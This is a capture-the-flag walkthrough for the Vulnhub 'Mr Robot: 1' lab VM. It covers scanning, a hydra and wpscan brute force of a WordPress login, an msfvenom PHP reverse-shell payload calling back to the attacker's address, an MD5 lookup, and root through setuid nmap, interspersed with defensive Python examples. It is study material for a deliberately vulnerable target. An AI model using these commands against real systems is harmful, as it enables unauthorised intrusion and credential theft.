Vulnhub - Mr Robot: 1 boot2root CTF walkthrough

2017-02-25


Introduction

Find the three flags that are hidden in the vm.

Flag 1

To begin the fun let’s run netdiscover to identify the target system.

Identify the right target

There it is, waiting at 10.0.2.7. The next step obviously is to run a quick nmap scan.

nmap -sS -p- 10.0.2.7 -v --open -oA target_$(date "+%Y-%m-%d") -sC -sV
Nmap scan results.

Run a file brute-force on the webserver.

gobuster -u http://10.0.2.7 -w /usr/share/seclists/Discovery/Web_Content/raft-medium-files.txt -e -r -l
The results of the directory brute-force attack.

While gobuster is running and the results are coming in, let’s just take a look at the website and the robots.txt.

User-agent: *
fsocity.dic
key-1-of-3.txt

Voila, there is the first key.

Flag 1

Flag 2

Next, we run wpscan to examine the WordPress installation.

wpscan --enumerate --threads 20 --batch --log --url http://10.0.2.7

Unfortunately, wpscan did not yield any obvious pointers for exploiting the WordPress installation. Furthermore, the tool was not able to enumerate any users that might have a valid login.

Let’s take another look at the discoveries so far. The fsocity.dic file might provide some pointers or provide input for a brute-force attack.

# wc -l fsocity.dic
858160 fsocity.dic
# sort -u fsocity.dic | wc -l
11451

After refreshing my knowledge of WordPress, the well-known username disclosure on the login form seemed to provide a starting point: the error message differs depending on whether the username exists.

User enumeration vulnerability.

With the fsocity.dic and hydra we might be able to brute-force a valid login name. To do this, we simply set the password to some bogus value and adjust the pattern for an invalid login to “Invalid username”.

hydra -L fsocity_sorted.dic -p test 10.0.2.7 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.0.2.7%2Fwp-admin%2F&testcookie=1:Invalid username" -t 50 -f -V
Valid login names.
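The oracle hydra keys on above is simply a login handler whose error text depends on whether the account exists. The following Python is an added example, not code from the walkthrough or from WordPress: USERS is a constructed in-memory user store with a made-up password, leaky_login mirrors the distinguishable responses, uniform_login is the corrected handler, and distinguishable_users checks a handler for the leak the same way a tester would.

```python
"""Why the wp-login.php error text is a username oracle, and the fix.

Added example, not part of the original walkthrough. USERS is a constructed
stand-in for a WordPress user table (the password is invented).
"""
import hmac

# Constructed store; nothing here comes from the VM.
USERS = {"elliot": "not-the-real-password"}

GENERIC = "The username or password you entered is incorrect."


def _credentials_ok(username: str, password: str) -> bool:
    # compare_digest keeps the comparison time independent of how many
    # leading characters of the guess happen to match.
    stored = USERS.get(username, "")
    return username in USERS and hmac.compare_digest(stored, password)


def leaky_login(username: str, password: str) -> str:
    """Vulnerable: the message reveals whether the account exists."""
    if username not in USERS:
        return "Invalid username"
    if not _credentials_ok(username, password):
        return "The password you entered for the username is incorrect."
    return "Login OK"


def uniform_login(username: str, password: str) -> str:
    """Hardened: unknown user and wrong password get the same response."""
    if _credentials_ok(username, password):
        return "Login OK"
    return GENERIC


def distinguishable_users(login_fn, candidates, probe_password="test"):
    """Check a handler for the leak: a candidate is distinguishable if its
    response differs from the response for a name that certainly does not
    exist. Returns the set of such candidates (empty means no oracle)."""
    baseline = login_fn("no-such-user-" + probe_password, probe_password)
    return {name for name in candidates
            if login_fn(name, probe_password) != baseline}


if __name__ == "__main__":
    wordlist = ["admin", "mrrobot", "elliot", "root"]  # constructed, not fsocity.dic
    print("leaky:  ", distinguishable_users(leaky_login, wordlist))    # {'elliot'}
    print("uniform:", distinguishable_users(uniform_login, wordlist))  # set()
```

The same check applies to password-reset and registration forms, which often leak the existence of an account even when the login form has been fixed.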

Awesome, and quite obvious that this is the username! With a valid login name the next step is to brute-force the password for the user “elliot”. Let’s switch back to wpscan for this task.

wpscan --log --batch --url 10.0.2.7 --wordlist ${PWD}/fsocity_sorted.dic --username elliot --threads 20
Valid login account found!
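Both the hydra and the wpscan runs above leave a very recognisable trace in the web server log: one source address POSTing to /wp-login.php far faster than any human. The following Python is an added example, not part of the walkthrough; the log lines are constructed in the Apache/nginx combined format, and the threshold and window size are assumptions to tune per site.

```python
"""Detecting a login brute force from web server access logs.

Added example, not part of the original walkthrough. sample_log() builds
constructed combined-format lines; the threshold and window are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Return (ip, timestamp, method, path, status) or None for unparseable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["method"], m["path"].split("?")[0], int(m["status"])


def login_bursts(lines, threshold=20, window_seconds=60):
    """Return {ip: peak attempts} for sources that POST to /wp-login.php at
    least `threshold` times inside any `window_seconds` span."""
    attempts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec[2] == "POST" and rec[3] == "/wp-login.php":
            attempts[rec[0]].append(rec[1])
    window = timedelta(seconds=window_seconds)
    flagged = {}
    for ip, stamps in attempts.items():
        stamps.sort()
        peak, start = 0, 0
        # Sliding window: advance `start` until the span fits in `window`.
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[ip] = peak
    return flagged


def sample_log():
    """Constructed lines: one host hammering the form, one normal visitor."""
    base = datetime(2017, 2, 25, 14, 3, 0)
    lines = []
    for i in range(25):  # 25 POSTs in under ten seconds
        t = (base + timedelta(seconds=i // 3)).strftime("%d/%b/%Y:%H:%M:%S") + " +0000"
        lines.append(f'10.0.2.8 - - [{t}] "POST /wp-login.php HTTP/1.1" 200 3128 "-" "constructed-ua"')
    lines.append('10.0.2.15 - - [25/Feb/2017:14:03:05 +0000] "GET /wp-login.php HTTP/1.1" 200 2710 "-" "Mozilla/5.0"')
    lines.append('10.0.2.15 - - [25/Feb/2017:14:03:40 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"')
    return lines


if __name__ == "__main__":
    print(login_bursts(sample_log()))  # {'10.0.2.8': 25}
```

Feeding this into a lockout or a fail2ban-style ban is the usual response; note that a fixed 20-per-minute threshold would miss a slow, distributed guess, so pair it with the failed-login count per account as well.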

The login credentials give us administrative access to the WordPress installation, so the next step is to gain a shell on the underlying server. This can easily be done by adding our own PHP code to one of the templates.

First, let’s create a metasploit payload that connects back to us.

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.0.2.8 LPORT=4444 -f raw -o meterpreter.php

After the reverse meterpreter session has been established, let’s take a look at the home directories. There is a user robot with the second flag file. Unfortunately, we do not have the necessary permissions, but in the same folder is a password hash for that user which we might be able to crack.

The meterpreter reverse shell has connected and we have access to the system.

A quick search on Google yields the plaintext for the MD5 hash.

MD5(abcdefghijklmnopqrstuvwxyz) = c3fcd3d76192e4007dfb496cca67e13b
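The reason a web search works here is that the hash is unsalted, fast MD5 of a string that appears in every wordlist and lookup table. The following Python is an added example, not part of the walkthrough: crack_md5 shows the one-hash-per-guess check over a constructed candidate list (the digest is the one shown above), and salted_kdf shows the storage format that makes such a lookup useless.

```python
"""Why the robot user's hash fell to a lookup, and what would have stopped it.

Added example, not part of the original walkthrough. The candidate list is
constructed, not fsocity.dic; TARGET_MD5 is the digest from the page.
"""
import hashlib
import secrets

TARGET_MD5 = "c3fcd3d76192e4007dfb496cca67e13b"  # from the walkthrough


def crack_md5(target_hex, candidates):
    """Unsalted MD5: one cheap hash per guess, and the same digest for every
    user with that password, so precomputed tables apply directly.
    Returns the matching candidate or None."""
    target = target_hex.lower()
    for word in candidates:
        if hashlib.md5(word.encode()).hexdigest() == target:
            return word
    return None


def salted_kdf(password, salt=None, iterations=200_000):
    """What the stored value should look like instead: a random per-user salt
    and a deliberately slow key derivation. Returns (salt_hex, digest_hex)."""
    salt = salt if salt is not None else secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt.hex(), digest.hex()


def lookup_table_reusable(password):
    """Two users with the same password get different stored digests once a
    salt is involved, so a table (or a search engine hit) for one cannot be
    applied to the other. Returns True only if the digests collide."""
    _, a = salted_kdf(password)
    _, b = salted_kdf(password)
    return a == b


if __name__ == "__main__":
    wordlist = ["password", "mrrobot", "abcdefghijklmnopqrstuvwxyz"]  # constructed
    print(crack_md5(TARGET_MD5, wordlist))                       # abcdefghijklmnopqrstuvwxyz
    print(lookup_table_reusable("abcdefghijklmnopqrstuvwxyz"))   # False
```

A salt alone still allows a per-user wordlist attack; the iteration count (or a memory-hard function such as scrypt or Argon2) is what makes each guess expensive.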

To get a proper shell, let’s switch back to the meterpreter session and open a shell. An interactive version can be started via the following command.

python -c 'import pty; pty.spawn("/bin/bash")'

Then we simply log in as the robot user with the discovered password. This gives access to the key file.

We have access to the second file!

Flag 3

After searching the server only the root user’s home directory is left. To access this folder we somehow need to gain root on the system. The kernel is fairly old and might be vulnerable to an exploit.

An old kernel version!

Searchsploit ftw.

One vulnerability found for the kernel!

Also, the exploit suggester might provide additional pointers.

There exists another vulnerability with a metasploit module.

Neither exploit works on the target system. The suggested kernel exploit overlayfs_priv_esc is applicable to the kernel according to the exploit module, but it fails here. The netfilter_priv_esc_ipv4 module is not compatible with the old Linux version.

So there has to be some way to gain root on the server. Let’s search for setuid files that might be exploitable.

find / -perm +6000 2> /dev/null
A local installation of nmap.
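From the defender's side, the same find command is the basis of a routine audit: list every setuid/setgid binary and report anything that is not on the distribution's expected list. The following Python is an added example, not part of the walkthrough; EXPECTED is an assumed baseline rather than any distribution's official list, and make_fixture builds a constructed scratch directory so the audit can be exercised without touching the real filesystem.

```python
"""Auditing setuid/setgid binaries, the defender's counterpart to
`find / -perm +6000`.

Added example, not part of the original walkthrough. EXPECTED is an assumed
baseline; make_fixture creates a constructed directory for testing.
"""
import os
import stat
import tempfile

SKIP_DIRS = {"/proc", "/sys", "/dev"}


def find_setuid(root="/"):
    """Walk `root` and return paths of regular files with the setuid or
    setgid bit set (the same selection as `find / -perm +6000`)."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
        # Do not follow symlinked directories or enter pseudo-filesystems.
        dirnames[:] = [d for d in dirnames
                       if not os.path.islink(os.path.join(dirpath, d))
                       and os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                hits.append(path)
    return sorted(hits)


# Assumed baseline: basenames of setuid programs one expects on a stock install.
EXPECTED = {"sudo", "su", "passwd", "chsh", "chfn", "gpasswd", "newgrp",
            "mount", "umount", "ping", "ping6"}


def unexpected_setuid(paths, expected=EXPECTED):
    """Return the subset of `paths` whose basename is not in the baseline.
    A setuid copy of nmap, for instance, would show up here."""
    return [p for p in paths if os.path.basename(p) not in expected]


def make_fixture():
    """Constructed scratch directory: one setuid file, one setgid file, one
    plain file. Returns (root, [expected hits])."""
    root = tempfile.mkdtemp(prefix="suid-audit-")
    suid = os.path.join(root, "nmap")
    sgid = os.path.join(root, "sudo")
    plain = os.path.join(root, "plain")
    for p in (suid, sgid, plain):
        open(p, "w").close()
    os.chmod(suid, 0o4755)
    os.chmod(sgid, 0o2755)
    os.chmod(plain, 0o755)
    return root, sorted([suid, sgid])


if __name__ == "__main__":
    for p in unexpected_setuid(find_setuid("/")):
        print("review:", p)
```

Run it from a known-good snapshot first and store the result as the baseline; subsequent runs then only report changes, which is what a package upgrade or an intruder's new binary looks like.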

There is nmap installed on the system, and version 3.81 is pretty old. Back then, nmap had an interactive mode that could be used to spawn a shell, and since the binary is setuid root, that shell runs as root. Seems like we have a winner! This version of nmap has that option enabled.

The third and final flag.

Links